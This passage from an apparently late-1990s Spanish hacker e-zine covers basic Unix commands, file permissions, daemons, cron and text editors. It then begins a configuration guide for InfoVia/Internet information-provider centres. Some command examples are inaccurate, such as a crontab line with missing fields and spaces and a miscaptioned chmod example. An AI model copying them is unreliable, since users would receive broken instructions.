Masachussets,  realizo  un  proyecto  especial  de  investigacion  de sistemas
operativos  llamado  Multics,  Multics  incorporo  muchos  conceptos nuevos de
multitarea.  En 1969,  Ken  Thompson  de AT&T Bell Laboratories, desarrollo el
sistema  operativo Unix,  incluyendo  en el  muchas de las caracteristicas del
proyecto   de  investigacion   Multics,  Thompson  adapto  el  sistema  a  las
nesecidades  de  un  entorno  de  investigacion diseandolo para ke se pudiera
ejecutar en minicomputadoras.
Bueno hay mas de esa historia pero seria muy tedioso relatarla ademas de ke lo
ke  nos interesa  ahora mismo es conocer algunos comandos basicos de Unix, asi
ke aca estan los mas importantes:


#########################Opciones y argumentos##########################

Una  opcion es  un  codigo consistente  en una letra precedida por un guion ke
modifica la accion ke efectuara la orden

ej: ls -l

ls  visualiza todos  los  archivos ke hay en el directorio actual la opcion -l
modificara  su tarea y  mostrara un linea  de informacion de cada archivo como
son  el tamao y la fecha y hora en ke fue por ultima vez modificado ademas de
los permisos ke este tiene.

Estos son otros argumentos ke se pueden utilizar con ls:
-a presenta una lista de los archivos de un directorio incluyendo los archivos
   ocultos.
-F muestra  los nombres de directorios precedidos por una barra para una mejor
   identificacion de estos.
-R lista el directorio actual con sus subdirectorios

Se pueden hacer combinaciones ls -al etc....


#######################Comandos comunes ########################

($ o # definen ke tipo de usuario eres si es $ tu status es de usuario si es #
eres superusuario o root)

ls : lista archivos
ej = $ ls nombre_archivo

cp : copia archivos
ej = $ cp nombre_archivo /home/user (donde /home/user son el directorio y
subdirectorio respectivamente )
( en el cual sera copiado el archivo )
rm : borra archivos
ej = $ rm nombre_archivo

mv : sirve para mover o renombrar archivos
ej = $mv nombre_archivo /home/user (eso en caso de mover el archivo a el
directorio rekerido)
ej = $mv nombre_archivo 2nombre_archivo (esto en caso de kerer renombrar el
archivo)

cd : igual ke en DOS permite acceder a un directorio
ej = $ cd nombre_directorio

mkdir : crea un directorio
ej = $mkdir nombre_directorio

rmdir : elimina un directorio
ej = $rmdir nombre_directorio

cat : filtro utilizado para mostrar el contenido de archivos
ej = $cat /home/user/nombre_archivo

more : visualiza un archivo pantalla por pantalla
ej = $more nombre_archivo

pwd : presenta el nombre de via completo del directorio en ke te encuentras
ej = $ pwd
/home/user
$_

find : permite efectuar una buskeda de archivos
ej = $ find nombre_archivo (esto busca el archivo en el directorio actual)
ej = $ find nombre_archivo / (buscar el archivo en todo el disco duro)


#################Operaciones de administracion de archivos ################

Unix  proporciona  varias  utilidades  para  el  manejo  de  sus   archivos  y
directorios, tambien puede controlar el acceso a sus archivos, cada archivo de
unix tiene  definido una serie de permisos ke determinan kienes tiene acceso a
el, asi como el tipo de acceso ke puedan tener.

Como ya dijimos antes ls -l nos permita visualizar los permisos de determinado
archivo o directorio con el comando chmod podemos modificar esos permisos.

ej = $ ls -l datos
-rw-r--r-x 1 juan wheater 207 Feb 15 11:30 datos
|| | | | | |
|| | | | | |
tipo |de archivo | | nombre del ar|chivo en b|ytes
| | | | |
permisos nombre de| dueo | nombre del archivo
| fecha y hora de la ultima actualizacion
nombre del grupo

En  ese ejemplo  vemos  los  datos  de un archivo en caso de ke datos fuera un
directorio su tipo seria d y se veria drw-r--r-x.
Los  permisos se dividen como ya vimos en 10 casillas de las cuales la primera
indica  si es  un archivo o  si es un directorio las tres siguiente ekivalen a
los permisos del dueo del archivo o directorio las tres ke siguen equivalen a
los permisos del grupo y las tres ultimas a los permisos de los demas usuarios
Asi estan distribuidos los permisos :
del dueo del grupo de otros rwx rwx rwx rw- rw- r--

donde r equivale al permiso de lectura
w permiso de escritura
x permiso de ejecucion


Estos  permisos pueden ser modificados utilizando la orden chmod , para su uso
se  han especificado  las categorias  de cada usuarios asi: u para el dueo, g
para el grupo y o para otros usuarios.
ej = $chmod g+rw datos (esto  le aade permisos de escritura y lectura a datos
para el grupo)
ej = $chmod o-x datos (en este caso se le kita el permiso de ejecucion a los
otros usuarios del archivo datos)
ej = $chmod u+r-wx (aqui se le da permiso de lectura al dueo pero de igual
modo se le kitan los permisos de lectura y escritura)
ej = $chmod a+r (este le da permiso de lectura a todos tanto a el dueo como
al grupo y a los demas usuarios)
ej = $chmod +r (hace lo mismo ke la anterior le da el permiso de lectura a
todos)

Como  ves  se  puede  jugar  con los permisos es simplemente cuestion de hacer
combinaciones y  usar la imaginacion, se pueden tambien modificar los permisos
de un directorio simplemente se especifica al final el nombre del directorio.


Bueno  por ahora  la  dejo alli mas adelante se profundisara con los permisos,
hablando de los permisos absolutos.

~~~~~~~~~~~~~~~~~~~
DAEMONS Y DRAGONES
~~~~~~~~~~~~~~~~~~~

Los  demonios  son  procesos  que  no  estan  conectados a un terminal; pueden
ejecutarse en modo subordinado y realizan trabajo util.

El integrador  de impresion es un ejemplo de DAEMON, es decir, un programa que
se  ejecuta en  el plano  secundario y  que proporciona un servicio de interes
general. Unix  posee cierto  numero de programas de este tipo. Algunos daemons
arrancan de  manera automatica cuando alguien inicializa el sistema, y siempre
estan  disponibles. Otros  permanecen  inactivos  la  mayor  parte del tiempo,
despertando a intervalos predefinidos o en respuesta a algun SUCESO.

Los daemons  ejecutan todo  tipo de funciones para lograr que el sistema opere
optimamente: manejan la memoria, controlan los trabajos de impresion, envian y
reciben  correo,  ejecutan  comandos  en  tiempos  especificos,   responden  a
peticiones remotas con finger, etcetera.

El  daemon integrador  de  la  impresion  se llama lpd. El daemon de finger se
llama fingerd. El daemon mas comun es sendmail.

Las  comunicaciones del  sistema  UNIX  a  traves  de  uucp  implican a varios
demonios:  uucico  maneja  la  planificacion  y administracion de los trabajos
uucp,  comprobando si  existe  algun trabajo  para  ejecutar, seleccionando un
dispositivo,  estableciendo la conexion,  ejecutando el trabajo y actualizando
el archivo  de  registro; uuxqt  controla  la  ejecucion  remota  de  ordenes.
Demonios  similares  manejan  la  impresion  y  el funcionamiento del spool de
impresora,  la  copia  de  seguridad  de  archivos. la limpieza de directorios
temporales  y  las operaciones de facturacion. Cada uno de estos demonios esta
controlado por cron, que es asimismo ejecutado por init (PID 1).
*--------------------------------------------------------------------------*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Que significa ... Daemons, dragones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Aunque  el  nombre  se  pronuncia 'dii-mon', la forma correcta de escritura es
daemon. No  se sabe  si el ser un acronimo o por que existe una variante de su
escritura en Inglaterra. (En la mitologia Celta, un daemon es, por lo general,
un espiritu  o inspiracion, bueno o neutral. Sin embargo, un Demon [demonio en
espaol] siempre es una entidad maligna.)

Tal  vez usted lea en alguna parte que el nombre significa "monitor de disco y
ejecucion"  (Disk and  Executing Monitor), termino  derivado  de  las antiguas
computadoras DEC  10 y 20. Sin embargo esta explicacion se formulo despues del
hecho.

Los  programadores   del   MIT (Massachusetts  Institute  of  Technology)  que
trabajaron en CTSS (Sistema Compatible de Tiempo Compartido, El CTSS tenia una
libreria llamada "runcom"", que ejecutaba una lista de comandos almacenados en
un  archivo), desarrollado  en  1963  usaron  primero  el  nombre  Daemon. Los
acuaron  para  lo  que otros programadores denominaron DRAGONES (cabe sealar
que estos trabajaban en el ITS [Sistema Incompatible de Tiempo Compartido]).

CTSS  e  ITS  son  ancestros de Unix. ITS fue un sistema operativo importante,
aunque extrao, con un sequito de adoradores en el MIT. Hoy en dia, ITS aun es
reverenciado entre hackers ancestrales de la Costa Este de Estados Unidos.

En  terminos precisos,  un dragon es un daemon que no se invoca explicitamente
pero  esta ahi, esperando  en el plano secundario para ejecutar un trabajo. El
daemon por ejemplo, podria considerarse un dragon.
*---------------------------------------------------------------------------*
~~~~~~~~~~~~~~~~
El demonio Cron
~~~~~~~~~~~~~~~~

Cron es un demonio de sistema que ejecuta ordenes en instantes especificos. La
informacion de ordenes y de planificacion estan mantenidas en el directorio:
   /var/spool/cron/crontabs en SVR4,
o en
   /usr/spool/cron/crontabs en los sistemas anteriores a SVR4.

Cada  usuario que  esta titulado para planificar directamente ordenes con cron
tiene un  archivo crontab. cron despierta periodicamente (generalmente una vez
cada minuto) y ejecuta los trabajos que estan planificados para ese minuto.

Las entradas en un archivo crontab tienen seis campos:

El primer campo es el minuto en que la orden va a ejecutarse.
El segundo campo es la hora.
El tercero, el dia del mes.
El cuarto, el mes del ao.
el quinto, el dia de la semana.
y el sexto, la cadena de orden a ejecutar.
Los asteriscos actuan como comodines.
En el ejemplo crontab se ejecuta el programa con nombre de camino
/var/cron/log y se envia por correo a "root" todos los
dias a las 8 P.M. El programa /home/john/bin/backup se ejecuta todos los
dias a las 2:30 A.M.

#
#
# MIN      HOUR      DCM       MOY       DOW      COMMAND
#
# (0-59)   (0-23)    (1-31)    (1-12)    (0-6)    (Note: 0=Sun)
# ------   -------   -------   -------   ------   --------------
#
0          18        *         *         *        /var/cron/log mail root
30         2         *         *         *        /home/john/bin/backup


El archivo/etc/cron.d/cron.allow  contiene la lista  de todos los usuarios que
tienen  permitido realizar  entradas en la crontab. Si se es administrador del
sistema,  o si  este  es su propio sistema, se tendra capacidad para modificar
los archivos  crontab. Si no  se tiene permitido modificar un archivo crontab,
se puede usar la orden at para planificar los trabajos.

~~~~~~~~~~~~~~~~
La orden crontab
~~~~~~~~~~~~~~~~

Para  aadir  algo  al  archivo  crontab,  se puede usar la orden crontab. Por
ejemplo,  puede planificarse  la supresion de archivos antiguos en la papelera
con una entrada como esta:
  0 1 0 cd/home/john/wastebasket; find . -atime+7 -exec /bin/rm-r { } 2>
  /dev/null;

Traduccion : cada  domingo a la 1 A.M., ir al directorio wastebasket de john y
suprimir todos los archivos que tengan una antiguedad de mas de siete dias. Si
se coloca esta linea en un archivo de nombre viejos y se ejecuta la orden:
  $crontab viejos

la  linea se colocara en el archivo crontab. Si se usa crontab sin especificar
un archivo,  la entrada estandar sera la que se coloque en el archivo crontab.
La orden:
  $ crontab
  CTRL - D

borra  los contenidos  de  crontab,  es  decir,  reemplaza  los contenidos con
nada :).

En resumen los daemons son programas residentes en memoria, ademas nadie es el
dueo y pueden ser lanzados por el sistema o por un usuarios permitidos.

John Jairo</td><TD width=40 nowrap><BR></TD></table>

~~~~~~~~~~~~~~~~~~~~~
Cual editor debo usar
~~~~~~~~~~~~~~~~~~~~~

Si  eres  usuario  de  Unix,  tienes  que  aprender  a  usar un editor (es una
obligacion). Las  tres opciones principales son vi, emacs y pico. Los primeros
son  programas  llenos  de  caracteristicas  o  comandos,  muy poderosos, cuyo
aprendizaje  exige tiempo. pico es un programa sencillo y mucho menos poderoso
que  se  puede  aprender  con  rapidez;  viene con el programa de correo pine.
Aunque  no  use pine para leer y enviar correo, puede usar pico como editor en
el trabajo cotidiano.

Cual editor debo usar? Es aconsejable que use vi o emacs (la decision es suya),
y deje que pico sea usado por "usuarios comunes".

Pico se diseo para ser sencillo, tanto que puede usarlo de inmediato con poco
entrenamiento  o  ayuda.  Por desgracia, dado que es muy sencillo, pico es tan
poco creativo, es frustrante hasta la locura.

El espiritu de Unix se inclina por el uso de herramientas poderosas, diseadas
con  logica:  herramientas  que le ayuden a pensar, innovar y hacer el trabajo
encomendado  con elegancia  y con minimo desorden. vi y emacs son programas de
este tipo. pico, por su parte, ocasiona mutaciones permanentes en el cerebro.

Esto  no  significa  que nadie deba usar pico (y otras herramientas parecidas;
por ejemplo, el programa de correo pine). En lo absoluto. Pero si usted es del
tipo de  personas con  la  inteligencia suficiente como para aprender Unix, lo
mas conveniente es que use vi o emacs.

Despues de  todo, son  muchas  las  personas  comunes que al usar pico, pueden
llevar vidas utiles y productivas (simples usuarios).

Si preguntara  a expertos que usan Unix cual editor emplean (pues todo usuario
con  experiencia en Unix usa algun editor), descubrira que las preferencias se
dividen entre vi y emacs.

El  vi,  es un editor disponible en todo sistema Unix y que funciona muy bien.
Ademas, es una herramienta estandar. No ha cambiado en aos . emacs tambien es
adecuado,  pero no  siempre  esta  disponible.  Es  recomendable  que  primero
aprenda  a  usar  vi,  a  menos  que tenga una razon poderosa para no hacerlo.
Siempre existe la posibilidad de aprender emacs en el futuro.

Si  esta  aprendiendo  vi  y se siente temporalmente abatido, descansa, tomate
una  pausa  e intente trabajar con emacs. Te parecera tan complejo e imposible
que, con seguridad, sentiras deseos de volver a vi.

John Jairo</td><TD width=40 nowrap><BR></TD></table>


***Esto es  todo por la primera edicon esperamos todas sus dudas o sugerencias
de temas que quizieran que se trataran en estos articulos, hasta la proxima...
Mr. AZTECh


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Guia de instalacion de CPI's - Unamed Person ]


    --== GUIA DE INSTALACION DE CENTROS PROVEEDORES DE INFORMACION ==--
    
                                                          ___...---===
                                Recopilado en la compaia de Telefonos
                                ===---...___

Author: Unamed Person
Date: 4/09/98

DISCLAIMER: Este  texto se  expone  UNICAMENTE para  fines  educativos y/o  de
investigacion. El  autor no  se hace  responsable de los posibles daos que se
pudiera producir la incorrecta utilizacion del texto.

Other:  Todo lo  aqui comentado  esta  pensado para  configuraciones  minimas,
se  recomineda utilizar las herramientas mas potentes existentes en el momento
de llevar a cabo las configuraciones.


Indice de Contenidos...........................................i

1 INTRODUCCION
1.1 OBJETIVO
1.2 CONCEPTOS RELACIONADOS

2 DESCRIPCION DE LOS CENTROS PROVEEDORES DE INFORMACION
2.1 CPI ACCESIBLE SOLO DESDE Internet
2.2 CPI ACCESIBLE SOLO DESDE InfoVia
2.3 CPI ACCESIBLE DESDE InfoVia E Internet
2.4 CPI PARA EL ACCESO A Internet DESDE InfoVia

3 ARQUITECTURA DE UN CPI

4 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE SUN SPARC
4.1 CONFIGURACION DE LA MAQUINA UNIX
4.1.1 Configuracion de direcciones, interfaces y rutas
4.1.1.1 Fichero /etc/hosts
4.1.1.2 Fichero /etc/nodename
4.1.1.3 Fichero /etc/hostname.le0
4.1.1.4 Fichero /etc/hostname.le0:1
4.1.1.5 Fichero /etc/netmasks
4.1.1.6 Fichero /etc/defaultrouter
4.1.1.7 Fichero /etc/rc2.d/S72inetsvc
4.1.2 Configuracion del servidor de web
4.1.2.1 Fichero httpd.conf
4.1.2.2 Fichero access.conf
4.1.2.3 Fichero srm.conf
4.1.3 Configuracion del servidor de RADIUS
4.1.3.1 Fichero cfg_local_INFOVIA
4.1.3.2 Fichero clientes_INFOVIA
4.1.3.3 Fichero usuarios_INFOVIA
4.1.4 Configuracion del servidor DNS
4.1.4.1 Fichero /etc/named.boot
4.1.4.2 Fichero /var/named/db.cpi.telefonica.es
4.1.4.3 Fichero /var/named/db.194.179.42
4.1.4.4 Fichero /var/named/db.10
4.1.4.5 Fichero /var/named/db.127.0.0
4.2 CONFIGURACION DEL ``ROUTER''
4.3 CONCLUSIONES

5 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE PC CON SISTEMA OPERATIVO
LINUX 
5.1 CONFIGURACION DE LA MAQUINA LINUX
5.1.1 Instalacion de las dos tarjetas Ethernet
5.1.2 Configuracion de direcciones, interfaces y rutas
5.1.2.1 Configuracion de la interfaz Internet (eth0)
5.1.2.2 Configuracion de la Interfaz InfoVia (eth1)
5.1.3 Configuracion del servidor de web
5.1.4 Configuracion del servidor de RADIUS
5.1.5 Configuracion del servidor DNS
5.2 CONFIGURACION DEL ``ROUTER''
5.3 CONCLUSIONES

6 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE UNA MAQUINA CON DIGITAL
UNIX
6.1 CONFIGURACION DE LA MAQUINA DIGITAL UNIX
6.1.1 Configuracion de direcciones, interfaces y rutas
6.1.1.1 Fichero /etc/hosts
6.1.1.2 Fichero /etc/rc.config
6.1.1.3 Nombre de la maquina
6.1.2 Configuracion del servidor de web
6.1.2.1 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/magnus.conf
6.1.2.2 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/obj.conf
6.1.2.3 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/magnus.conf
6.1.2.4 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/obj.conf
6.1.3 Configuracion del servidor RADIUS
6.1.4 Configuracion del servidor DNS
6.2 CONFIGURACION DEL ``ROUTER''
6.3 CONCLUSIONES

7 INFORMACION ADICIONAL PARA LA INSTALACION DE UN CPI

8 PROCESO ADMINISTRATIVO

Glosario 


1 INTRODUCCION
  ============

En  el  presente  documento   se  propone  una  solucion  unica  para  Centros
Proveedores de Informacion (CPI). Esta solucion es valida para CPIs conectados
a Internet o a InfoVia, e  incluso para CPIs conectados tanto a InfoVia como a
Internet. Se ha buscado una solucion que sea valida para cualquier tipo de CPI.
Esta  solucion se  basa en una unica arquitectura, la cual, se caracteriza por
el reducido equipamiento que necesita. De este modo se simplifica y abarata la
construccion de un CPI.

1.1 OBJETIVO 
    --------

En  este documento  se  explica una  solucion  global para  la construccion de
centros  proveedores de  informacion.  Esta solucion  es valida para cualquier
tipo de  CPI: los  conectados  solo a  InfoVia  o a  Internet,  asi  como  los
conectados tanto a InfoVia como a Internet.

La estructura de este documento es la siguiente: 

        . Capitulo 1: Introduccion.

Presenta  una  introduccion  al  resto  del  documento.  Tambien  incluye  una
explicacion  de los conceptos relacionados con los CPIs. Por ultimo se adjunta
una relacion de la bibliografia utilizada.

        . Capitulo 2: Descripcion de los centros proveedores de informacion.

En  este  capitulo se presentan  los distintos tipos de centros proveedores de
informacion,  cuya integracion  en  una unica  arquitectura es el objetivo del
presente documento.

        . Capitulo 3: Arquitectura de un CPI.

Se explica en detalle la arquitectura propuesta para un CPI. 

        . Capitulo 4: Ejemplo de configuracion de un CPI sobre SUN SPARC.

Se presenta  un ejemplo de como habria que configurar un CPI de acuerdo con la
arquitectura presentada en el capitulo anterior. Para el ejemplo se ha elegido
un CPI que sea accesible tanto desde InfoVia como desde Internet, con pasarela
a  Internet desde  InfoVia. En  este ejemplo se emplea una maquina UNIX de SUN
Microsystems y un servidor web NCSA.
 
        . Capitulo 5: Ejemplo de configuracion de un CPI sobre PC con Linux.

En este  capitulo se  explica como habria que configurar un CPI de acuerdo con
la arquitectura presentada  en el capitulo tres. Para el ejemplo se ha elegido
un  CPI accesible  tanto  desde InfoVia  como  desde Internet,  con pasarela a
Internet desde  InfoVia. En este ejemplo se emplea un PC con sistema operativo
Linux, y un servidor web NCSA. 

        . Capitulo 6: Ejemplo de configuracion de un CPI sobre una maquina con
                      sistema operativo DIGITAL UNIX.

Se  desarrolla un  ejemplo  de como  configurar  un CPI segun  la arquitectura
presentada en el  capitulo tres. Para el ejemplo se ha tomado un CPI accesible
tanto desde InfoVia como desde Internet, con pasarela a Internet desde InfoVia.
En el ejemplo se emplea una maquina con el sistema operativo Digital Unix 3.2C,
y un servidor web NCSA. 

        . Capitulo 7: Informacion adicional para la instalacion de un CPI.

Se informa  que el  codigo de  un servidor  RADIUS, compilado  para diferentes
plataformas, esta disponible en un servidor ftp anonimo.

        . Capitulo 8: Proceso administrativo.

Se  detallan los  aspectos  administrativos que  un  proveedor de  informacion
debera de realizar para establecer un CPI.


1.2 CONCEPTOS RELACIONADOS
    ----------------------

. InfoVia es una red que permite el acceso a los usuarios a centros proveedores
de  informacion  bien a traves de la red telefonica basica (RTB), de la RDSI o
GSM. InfoVia multiplexa y demultiplexa el trafico procedente de los usuarios a
los  diferentes centros  proveedorees de informacion. Los CPIs se conectaran a
los Centros de Servicio InfoVia (CSIV) a traves de enlaces frame relay.

. Centro  Proveedor de  Informacion (CPI), expresion  con la que se designa al
conjunto de equipos que proporcionan informacion al usuario. La informacion de
un  CPI podra  ser accesible desde InfoVia o desde Internet. Tambien puede ser
accesible desde  InfoVia e Internet. Existe una ultima opcion de CPI que es la
de ``pasarela''  a Internet: se trata de un centro accesible desde InfoVia que
permite a los usuarios autorizados el acceso a Internet.

. Centro  de Servicio  InfoVia (CSIV), con este nombre se denomina al conjunto
de  equipos  que ofrecen  la  funcionalidad InfoVia  al  usuario de  una  zona
geografica  concreta. Es  decir, el servicio ofrecido por InfoVia se encuentra
distribuido en varios centros repartidos por el territorio nacional en funcion
de  la demanda  y  utilizacion del  servicio.  En general  se usara el termino
InfoVia indistintamente para referirse al servicio prestado como a los equipos
(red) sobre los que se presta dicho servicio.

. Centro  de Gestion de InfoVia (CGIV), es el conjunto de equipos que permiten
a  Telefonica realizar  la  gestion de  los  distintos centros que soportan la
prestacion  del servicio.  En  el documento  se  usara el  termino  Sistema de
Gestion para referenciarlo.

. El  usuario llamante  es la persona que realiza la llamada a un CPI a traves
de  InfoVia. Para  ello  debera poseer  un  PC con  la torre de comunicaciones
TCP/IP  instalada, y  un  modem (acceso  a traves de la RTB) o un adaptador de
terminal (acceso a traves de la RDSI).

. El  proveedor del  servicio  o cliente,  es  la persona  o entidad que desea
suministrar  informacion a traves de InfoVia, de Internet, o a traves de ambas
redes. 
 
. Frame  relay, es  el  protocolo utilizado  entre  dispositivos de  usuario y
equipos  de  red (por  ejemplo nodos  de conmutacion).  Es  un  protocolo  mas
eficiente que  el de X.25.  Este servicio se  provee por tecnicas de Circuitos
Virtuales Permanentes (PVC). 

. Servidor RADIUS,  es un  software  que puede  correr  en una  maquina de las
instalaciones   del  proveedor  de  informacion. Su  mision  es  realizar,  en
colaboracion  con InfoVia,  la  autentificacion de  los  abonados suscritos al
proveedor de informacion.

. IANA, la autoridad que asigna los direcciones en Internet. 

. RFCs, son los documentos oficiales de Internet. 

. CIR, es un parametro de contratacion de una conexion frame relay, para  cada
uno  de  los circuitos  virtuales  permanentes  contratados por interfaz. Este
parametro  de contratacion  determina el numero minimo de bits por segundo que
la red va a ser capaz de conmutar para ese circuito virtual permanente.


2 DESCRIPCION DE LOS CENTROS PROVEEDORES DE INFORMACION 
  =====================================================

Existen  distintos  tipos  de  centros proveedores  de  informacion.  En  este
capitulo  se describe  la arquitectura y los servicios que puede soportar cada
uno de ellos. 

Los tipos de CPI son los siguientes: 

        . CPI accesible solo desde Internet.
        . CPI accesible solo desde InfoVia.
        . CPI accesible desde InfoVia e Internet.
        . CPI para el acceso a Internet desde InfoVia.

Estas  configuraciones son  optimizables.  En el  Capitulo  3  se  indica como
hacerlo  en un  contexto  UNIX, y  en  el  Capitulo  4 y  en el  Capitulo 5 se
proponen  ejemplos de  CPIs configurados de acuerdo a la solucion presesentada
en el  Capitulo 3. En los siguientes apartados de este capitulo se describe en
detalle cada uno de estos tipos de CPI. 


2.1 CPI ACCESIBLE SOLO DESDE Internet 
    ---------------------------------

Este CPI solo estara conectado a la red Internet. Los servicios que ofrecera a
los  usuarios que  accedan seran todos los que puede ofrecer Internet como son
entre otros: 

        . Servidor de web. 
        . Servidor de mail. 
        . Servidor de news. 

Este  tipo  de CPI  que  solo  es accesible  desde  Internet no forma parte de
InfoVia. Todas las direcciones de los equipos que integran el CPI han de estar
registradas en Internet. 


2.2 CPI ACCESIBLE SOLO DESDE InfoVia
    --------------------------------

Este CPI  solo estara conectado a la red InfoVia. Los servicios que ofrecera a
los  usuarios que accedan seran todos los que puede ofrecer Internet, dado que
la red  InfoVia emplea tambien  protocolos IP y las direcciones reservadas por
Internet para redes privadas (RFC 1918). Entre estos servicios esta:

        . Servidor de web. 
        . Servidor de mail. 
        . Servidor de news. 

En  este tipo  de  centros, las direcciones de los equipos que lo integran las
proporciona InfoVia.

 
2.3 CPI ACCESIBLE DESDE InfoVia E Internet
    --------------------------------------

Este  CPI  esta  conectado  a las  dos  redes, a  InfoVia  y a  Internet.  Una
caracteristica fundamental  de este tipo de centros proveedores de informacion
es  que aun  cuando  son accesibles  desde  las dos  redes,  no se mezclan los
accesos.   Es  decir,  cuando  un  usuario  acceda  desde  Internet,  toda  la
informacion  solicitada se  le enviara  a traves de Internet. Si el acceso del
usuario  es por InfoVia,  toda la informacion la recibira a traves de InfoVia.
Esto  ha de ser  asi puesto que  en InfoVia el direccionamiento empleado es el
reservado  a redes  privadas. Por  tanto, cualquier CPI que se instale de este
tipo debera respetar esta condicion. Los servicios que ofrecera a los usuarios
que accedan por cada  una de ellas seran todos los que puede ofrecer Internet.
Entre estos servicios estan:

        . Servidor de web. 
        . Servidor de mail. 
        . Servidor de news. 


2.4 CPI PARA EL ACCESO A Internet DESDE InfoVia
    -------------------------------------------

Este  tipo de  CPI esta  conectado a las dos redes, a InfoVia y a Internet. La
peculiaridad de este tipo de centros es que permite a un usuario procedente de
InfoVia  el acceso a Internet. Para ello, en una de las maquinas del centro se
ha de instalar  un servidor RADIUS cuya mision es la de asignar direcciones de
Internet a  los usuarios de InfoVia que se lo soliciten. Para que un CPI pueda
actuar  como ``pasarela'' de  InfoVia a Internet,  ha de  disponer de un rango
(``pool'') de direcciones validas de Internet. El usuario que vaya a acceder a
Internet desde InfoVia lo ha de hacer con una de las direcciones de ese rango,
es  decir,  con  direcciones  de  Internet.  Esto  es asi  dado  que  con  las
direcciones  empleadas  por  InfoVia  no  se  puede  acceder  a  Internet (son
direcciones  reservadas para redes privadas). Cuando un usuario quiera acceder
a Internet a traves de este CPI, el cliente RADIUS instalado en el CSIV al que
ha accedido el usuario, se conectara al servidor RADIUS del CPI.
El  cliente solicitara  al  servidor una  de las direcciones IP que administra
este servidor RADIUS. Para ello el cliente ha de indicar al servidor el nombre
(``login'')  y la clave (``password'') del usuario llamante. Si el nombre y la
clave  son validos, y al CPI le quedan direcciones de Internet disponibles, el
servidor  enviara al  cliente RADIUS  del CSIV  la direccion  IP con la que el
usuario puede acceder a Internet.

La comunicacion entre el cliente RADIUS del CSIV y el servidor RADIUS del  CPI
se  hace siempre  por medio  de direcciones  de InfoVia. Este tipo de centros,
ademas puede dar servicios tanto a los usuarios que acceden desde InfoVia como
a los que acceden desde Internet. Es decir, este centro ademas de servir a los
usuarios  llamantes como ``pasarela''  desde InfoVia a Internet, tambien puede
servir como un CPI del tipo descrito en el apartado anterior, el apartado 2.3.
En la Figura  2-4 se muestra un diagrama de un CPI con acceso a Internet desde
InfoVia.


3 ARQUITECTURA DE UN CPI 
  ======================

En este capitulo se presenta una arquitectura unica para cualquier tipo de CPI.
Se trata  de una solucion valida tanto para CPIs accesibles solo desde InfoVia
o  Internet, asi como para un CPI accesible desde las dos redes o con pasarela
a  Internet desde  InfoVia. Las  razones por  las cuales  se  ha  buscado  una
arquitectura unica para cualquier tipo de CPI son dos:

1. Facilitar  el montaje  a  todas las  entidades que quieran instalar un CPI,
cualquiera que sea el tipo de CPI que vaya a instalar. 

2. Dar una solucion con el menor numero posible de equipos, lo que implica una
reduccion en los costes de instalacion del CPI.

Para proponer  una unica arquitectura en los CPIs, cualquiera que sea su tipo,
se ha tenido en cuenta lo siguiente: 

. Por  medio del  protocolo frame  relay  un  mismo  enlace  admite  multiples
circuitos  virtuales permanentes (PVC),  cada uno  de  los  cuales  puede  dar
soporte  a una conexion distinta. De este modo un unico enlace frame relay con
dos PVCs,  podria conectar a  un CPI con Internet  y con un Centro de Servicio
(CSIV) de InfoVia. El primer PVC soportaria la conexion con Internet.
Por medio del segundo PVC, el CPI se conectaria con el CSIV de InfoVia.

. Algunas  maquinas UNIX  admiten multiples  direcciones (y  tambien multiples
mascaras) en  cada una  de sus  interfaces. Esto  hace posible  que una  unica
maquina UNIX, con una unica interfaz, pueda comportarse como si se tratase  de
dos maquinas diferentes, cada una con su direccion y mascara propia. Es decir,
se puede hacer que una misma maquina actue como si se tratase de dos maquinas,
cada una  de las  cuales forma parte de una red diferente. Esta caracteristica
que tienen  algunas maquinas UNIX  evita el tener  que adquirir e instalar una
tarjeta con  multiples interfaces  para cada  maquina que  se quiere  que  sea
accesible  desde redes  distintas  (InfoVia e  Internet), ya que esto mismo se
puede conseguir via software.

. Un ``router'' admite en cada una de sus interfaces (tanto en  las interfaces
ethernet como en las interfaces serie) multiples direcciones y mascaras.  Esto
permite  estructurar   cada  una   de  las  interfaces  de  un  ``router''  en
subinterfaces. Esta peculiaridad permite a partir de una unica interfaz serie,
disponer  en realidad  de multiples  interfaces. Para  ello  basta  configurar
multiples subinterfaces en esa unica interfaz.
 
. Los  servidores de  web NCSA o  NetScape instalados  en una maquina UNIX con
multiples  direcciones IP,  pueden proporcionar  diferentes  paginas  HTML  en
funcion de la direccion IP. Es decir, un servidor NCSA, o  NetScape, instalado
en una  maquina UNIX con  varias direcciones  IP, se puede configurar de forma
que  se comporte  como varios  servidores de web  diferentes, cada uno con sus
propios contenidos. Cada uno de estos ``servidores virtuales''  se corresponde
con una de las direcciones IP asignadas a la maquina.

. Un  enlace  frame  relay. El  numero   de  circuitos  virtuales  permanentes
necesarios sera:

        * CPI accesible solo desde Internet: 1 PVC.
        * CPI accesible solo desde InfoVia: 1 PVC por cada CSIV de InfoVia al
          que se conecte el CPI. 
        * CPI accesible desde InfoVia e Internet: 1 PVC para Internet, y 1 PVC
          por cada uno de los CSIV de InfoVia al que se conecte el CPI.
        * CPI con acceso a Internet desde InfoVia: 1 PVC para Internet y 1 PVC
          por cada uno de los CSIV de InfoVia al que se conecte el CPI.

. Un  unico ``router''  con una  interfaz ethernet  y una  interfaz serie. Por
medio de la interfaz ethernet, el ``router'' se conecta a la red de area local
(RAL) del CPI. El enlace frame relay se lleva a la interfaz serie.
 
        * CPI accesible solo desde Internet: 1 PVC.
          Interfaz ethernet: 1 direccion y mascara IP dentro del rango de
          direcciones validas de Internet asignado por el IANA al proveedor.
          Interfaz serie: 1 subinterfaz al que se ha de asignar el unico PVC
          del enlace frame relay. 
